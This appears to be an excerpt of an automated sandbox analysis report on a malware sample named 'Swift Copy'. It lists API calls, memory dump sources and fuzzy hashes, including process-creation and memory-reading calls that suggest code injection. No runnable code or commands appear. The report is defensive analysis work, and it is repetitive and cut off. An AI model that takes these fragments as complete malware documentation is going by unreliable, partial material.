                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: LibraryLoad_wcslen
                                              • String ID: >>>AUTOIT SCRIPT<<<
                                              • API String ID: 3312870042-2806939583
                                              • Opcode ID: 2602e1c9512df557313576ddf7a26a5226a0c16ff81402cbdf673f74a9f82bfe
                                              • Instruction ID: 1ec7a4f705d736253738df27c1358366f66e30d734857519817cffddc3327269
                                              • Opcode Fuzzy Hash: 2602e1c9512df557313576ddf7a26a5226a0c16ff81402cbdf673f74a9f82bfe
                                              • Instruction Fuzzy Hash: 79B18D315086419FCB14EF24C89296EB7E5EF94310F14895DF49A972A2FB30ED49CBB2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID: EA06
                                              • API String ID: 2638373210-3962188686
                                              • Opcode ID: c8fc372f4993d1619702d05cc83c3b8f67325edeb6e36e8082d98183682892c1
                                              • Instruction ID: 94f546a549f080afaf8e0aa83ea292f947d73640a3e7e1dfb7fc56e8a28925cd
                                              • Opcode Fuzzy Hash: c8fc372f4993d1619702d05cc83c3b8f67325edeb6e36e8082d98183682892c1
                                              • Instruction Fuzzy Hash: 8A01B5729042587EDF18D7A8C856EBEBBF8DB05301F00455AF192D2181E5B4E608CB70
                                              APIs
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D73908
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_
                                              • String ID:
                                              • API String ID: 1144537725-0
                                              • Opcode ID: 00923c26ea49c6f2ebff46a02c40dc665d4319ff86b7ae998019e447de29691f
                                              • Instruction ID: d8d681232c47cb08c33751f1a920aad162a8ac90287688cc3799e2fe4ca662a9
                                              • Opcode Fuzzy Hash: 00923c26ea49c6f2ebff46a02c40dc665d4319ff86b7ae998019e447de29691f
                                              • Instruction Fuzzy Hash: 15319170604301DFD720DF65D884797BBE8FB49708F04096EF5DA93240E771AA88DB62
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00ED1ACD
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00ED1AF1
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00ED1B13
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1678475420.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ed0000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                              • Instruction ID: 21903efe982d184e52fc1952074fed787ea8e28d403efa4d2581aceb01b7e35d
                                              • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                              • Instruction Fuzzy Hash: AE12BE24E14658C6EB24DF64D8507DEB232EF68300F10A4E9D10DEB7A5E77A4F81CB5A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 982593588e01323f283f57135bda97746e0bf60585b7d5ed365e3a470168a20e
                                              • Instruction ID: eef7afbd87a85c24e2fe9989d9daab162ded3c63e43840fa6bd4ef9cf606a48b
                                              • Opcode Fuzzy Hash: 982593588e01323f283f57135bda97746e0bf60585b7d5ed365e3a470168a20e
                                              • Instruction Fuzzy Hash: 1FC17171D0020A9BCF14EF9CC8919EEB7B5EF84310F54C526E95AA7191FB349982CB72
                                              APIs
                                                • Part of subcall function 00D74E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E9C
                                                • Part of subcall function 00D74E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D74EAE
                                                • Part of subcall function 00D74E90: FreeLibrary.KERNEL32(00000000,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EC0
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EFD
                                                • Part of subcall function 00D74E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E62
                                                • Part of subcall function 00D74E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D74E74
                                                • Part of subcall function 00D74E59: FreeLibrary.KERNEL32(00000000,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E87
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Library$Load$AddressFreeProc
                                              • String ID:
                                              • API String ID: 2632591731-0
                                              • Opcode ID: e9c6ec2886830fa5d0392fbe370e0be30681981182231bfa8df125df69486ae0
                                              • Instruction ID: c053377e2ed96f8d9843547543c461f69e950cf7717d7f17126a1c4aba9fa86d
                                              • Opcode Fuzzy Hash: e9c6ec2886830fa5d0392fbe370e0be30681981182231bfa8df125df69486ae0
                                              • Instruction Fuzzy Hash: 9B11C132600205AADB15FB64DC12BADB7A5EF40710F20C42DF54AB61D1FFB09A459B70
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: __wsopen_s
                                              • String ID:
                                              • API String ID: 3347428461-0
                                              • Opcode ID: c7460c925c716567277cf16d2f247989a7b9c0610404cdc60a5bac026c9a82d9
                                              • Instruction ID: b638e84213c7b47d30b0e3b13aa7726646c4ff83dfd47d18ec77ac8ffd1ffe70
                                              • Opcode Fuzzy Hash: c7460c925c716567277cf16d2f247989a7b9c0610404cdc60a5bac026c9a82d9
                                              • Instruction Fuzzy Hash: 5711487590420AAFCF05DF58E94099A7BF9EF49300F144069FC08AB312DA30DA11DBA5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                              • Instruction ID: e9ca5c4c25e83889a064ded5a276ea6a2102a3fe44219c0ca10adfe141ce008a
                                              • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                              • Instruction Fuzzy Hash: E0F0F432511E10AADF317B6A8C05B5A3398DFA3330F140B15F820972D2DB70D8028ABA
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID:
                                              • API String ID: 176396367-0
                                              • Opcode ID: 925dd5c5bacb953470c4b1c403d787b0688307d40fd5fb7636ab76acd22fdb11
                                              • Instruction ID: 3ce602e477628d9fce546289b7110bc5f5002a0cc3690e1556a24de84e2a3096
                                              • Opcode Fuzzy Hash: 925dd5c5bacb953470c4b1c403d787b0688307d40fd5fb7636ab76acd22fdb11
                                              • Instruction Fuzzy Hash: 95F0C8B36007047ED725AF29D806E67BB94EB44760F10852AFA19CB1D1EB31E5108BB0
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,00E41444,?,00D8FDF5,?,?,00D7A976,00000010,00E41440,00D713FC,?,00D713C6,?,00D71129), ref: 00DA3852
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                              • Instruction ID: 9022e5501bdab575a7b3ff5ee07951687816621190911ea2dc6e505bf6025572
                                              • Opcode Fuzzy Hash: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                              • Instruction Fuzzy Hash: B5E0ED31102324AAEB212B779C04F9A3A5AEF837B0F190220BC44A2581DB29DE0282F0
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74F6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 36ea80680c813c2b11786c50c4cce33d7f559bd3562e531b009e856c14c84af0
                                              • Instruction ID: f8b715a56a6a59662dac638801f982eed15a317780101186bbdc56d4344c56a6
                                              • Opcode Fuzzy Hash: 36ea80680c813c2b11786c50c4cce33d7f559bd3562e531b009e856c14c84af0
                                              • Instruction Fuzzy Hash: 69F0157110A752CFDB359F64D490822FBE4EF15329324CA6EE1EE82621D7329888DB20
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D72DC4
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: LongNamePath_wcslen
                                              • String ID:
                                              • API String ID: 541455249-0
                                              • Opcode ID: a9671bf7e1fa17586f4e6e7c94fb3ebb6e87fdb6790e0e88ccc254b8ead05fdc
                                              • Instruction ID: fb0e501646e1ba60520b960cb726dc066875fd13d221bb737d9e82afb4a9220e
                                              • Opcode Fuzzy Hash: a9671bf7e1fa17586f4e6e7c94fb3ebb6e87fdb6790e0e88ccc254b8ead05fdc
                                              • Instruction Fuzzy Hash: 12E0C276A042245BCB20A3989C06FEA77EDDFC8790F0441B1FD09E7259EA60ED84C6B0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                              • Instruction ID: 45f52247410664acacdee655941f9af3491195bcaeb89ace0815afbc29f94d3e
                                              • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                              • Instruction Fuzzy Hash: DDE04FB0609B005FDF39AA28A8517B677E8DF49300F04096EF69B82252E57268458A6D
                                              APIs
                                                • Part of subcall function 00D73837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D73908
                                                • Part of subcall function 00D7D730: GetInputState.USER32 ref: 00D7D807
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00D72B6B
                                                • Part of subcall function 00D730F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D7314E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                              • String ID:
                                              • API String ID: 3667716007-0
                                              • Opcode ID: 8abbf04b79fbb2c63ffaa74610f0501fdce8e5efaa788f414ec4a4353c9e1c45
                                              • Instruction ID: 877eef3d9295319a9e8821ba8d2af7f0927beb9f3d35197134066de52566c724
                                              • Opcode Fuzzy Hash: 8abbf04b79fbb2c63ffaa74610f0501fdce8e5efaa788f414ec4a4353c9e1c45
                                              • Instruction Fuzzy Hash: C1E0862230424806CB08BB75A85357DB759DBE6351F40957EF15A631A3EF25498A4272
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00DB0704,?,?,00000000,?,00DB0704,00000000,0000000C), ref: 00DB03B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                              • Instruction ID: 206029e4bd219b0a3caa76f2a094b7108fb2c6bc57e44eb7dd252a0a5274b61e
                                              • Opcode Fuzzy Hash: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                              • Instruction Fuzzy Hash: 2AD06C3204010DBFDF028F85DD06EDA3BAAFB48714F114100BE5866020C732E861AB90
                                              APIs
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00D71CBC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem
                                              • String ID:
                                              • API String ID: 3098949447-0
                                              • Opcode ID: a2b13c3aaf896d0cbd4ca17daeb107afdbc0e56c94f7d2ee5824b7568bd0d05b
                                              • Instruction ID: 2a26624c32a19faa042157f57823a87ad5a435a59ecc58265b462b7569599fce
                                              • Opcode Fuzzy Hash: a2b13c3aaf896d0cbd4ca17daeb107afdbc0e56c94f7d2ee5824b7568bd0d05b
                                              • Instruction Fuzzy Hash: 1EC0923E280304AFF6148B82BC4AF1077A4A34DF00F548001F709B95E3C3A228AAEA51
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
